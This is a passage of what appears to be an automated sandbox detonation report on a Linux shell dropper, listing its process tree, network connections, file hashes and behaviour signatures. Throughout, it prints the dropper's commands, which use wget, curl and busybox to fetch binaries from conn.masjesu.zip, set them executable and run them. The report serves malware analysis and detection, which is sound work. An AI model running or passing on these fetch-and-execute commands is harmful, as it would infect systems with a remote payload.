
[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/chmod

[chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw

[./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/rm

[rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/chmod

[chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3

[./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/rm

[rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/chmod

[chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP

[./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/rm

[rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/chmod

[chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q

[./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/rm

[rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/chmod

[chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx

[./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/rm

[rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/chmod

[chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD

[./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/rm

[rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/chmod

[chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l

[./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/rm

[rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/chmod

[chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB

[./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/rm

[rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/chmod

[chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6

[./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/rm

[rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/chmod

[chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em

[./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/rm

[rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/chmod

[chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ

[./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/rm

[rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw

MD5 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1 a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:30

Reported

2024-10-29 02:33

Platform

debian9-mipsel-20240226-en

Max time kernel

124s

Max time network

144s

Command Line

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA N/A
N/A /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ N/A
N/A /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F N/A
N/A /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw N/A
N/A /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 N/A
N/A /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP N/A
N/A /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q N/A
N/A /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB N/A
N/A /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 N/A
N/A /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em N/A
N/A /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ N/A
N/A /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx N/A
N/A /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD N/A
N/A /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l N/A
N/A /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA N/A
N/A /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ N/A
N/A /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /usr/bin/curl N/A
File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /usr/bin/curl N/A
File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /usr/bin/curl N/A
File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /usr/bin/curl N/A
File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /usr/bin/curl N/A
File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /usr/bin/curl N/A
File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /usr/bin/curl N/A
File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /usr/bin/curl N/A
File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /usr/bin/curl N/A
File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /usr/bin/curl N/A
File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /usr/bin/curl N/A
File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /usr/bin/curl N/A
File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /usr/bin/curl N/A
File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /usr/bin/curl N/A
File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /usr/bin/curl N/A
File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /usr/bin/curl N/A
File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /usr/bin/curl N/A

Processes

/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh

[/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/chmod

[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/rm

[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/chmod

[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ

[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/rm

[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/chmod

[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F

[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/rm

[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/chmod

[chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw

[./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/bin/rm

[rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/wget

